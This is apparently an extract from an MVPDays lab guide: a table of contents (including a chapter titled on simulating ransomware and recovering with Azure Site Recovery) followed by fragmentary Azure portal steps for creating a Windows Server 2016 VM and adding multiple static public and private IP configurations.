Building a Hyper-V Nested VM with Multiple Public IP Addresses in Azure ........... 24

Building a Windows Server 2016 Virtual Machine ................................................ 24

Using BigDemo to Build your Lab .............................................................................. 88

Configuring Windows Admin Center ......................................................................... 95

Configure Azure Site Recovery .......................................................................... 119

Chapter 5.................................................................................................................... 127

Windows Defender Advanced Threat Protection ATP ............................................ 127

Chapter 6.................................................................................................................... 133

Simulating a Ransomware Attack ............................................................................ 133

Chapter 7.................................................................................................................... 152

Recovering from Ransomware using Azure Site Recovery ................................... 152

Chapter 8.................................................................................................................... 188

Disaster Recovery items left forgotten .................................................................... 188

Chapter 9.................................................................................................................... 189

We often get asked the question “Who should attend MVPDays”?

Setting up your Azure

1. Go to https://www.azure.com and then click Free account.

2. On the free account page, click Start free.

5. Enter your password and then click Sign in

account to pay as you go or others account type.

Microsoft products and services, and then click Sign up.

Building a Hyper-V Nested VM

Building a Windows Server 2016 Virtual Machine

1. Logon to your Microsoft Azure Account and select Create a resource.

2. On the New page, select Windows Server 2016 VM

resources, and then click OK.

Confirm password: Reenter login password

Public inbound ports: Select Allow selected ports.

6. On the Create a Virtual Machine page, click Disks.

OS disk type: Select Premium SSD

8. On the Create a virtual machine page, click Networking.

9. On the Create Public IP address page, the settings are as follows

Creating Multiple Internal and External IP’s for the Lab

1. On the Microsoft Azure portal page, select Virtual machines.

2. On the Virtual machines page, click GDMCALABHV1.

3. On the GDMCALABHV1page, select Networking.

4. On the GDMCALABHV1-Networking page, select Network Interface: gdmcalabhv1238.

5. On the Network Interface page, select IP configurations.

6. On the IP configurations page, select ipconfig1.

8. Go back to the IP configurations page, click Add.

Private IP address Allocation: Static

Public IP address: Enable

IP address: click configure required settings

10. Choose public IP address: Create new

Name: Enter name for Public IP

Assignment: Static and then click OK

Choose public IP address: Create new

Name: Enter name for Public IP

Assignment: Static and then click OK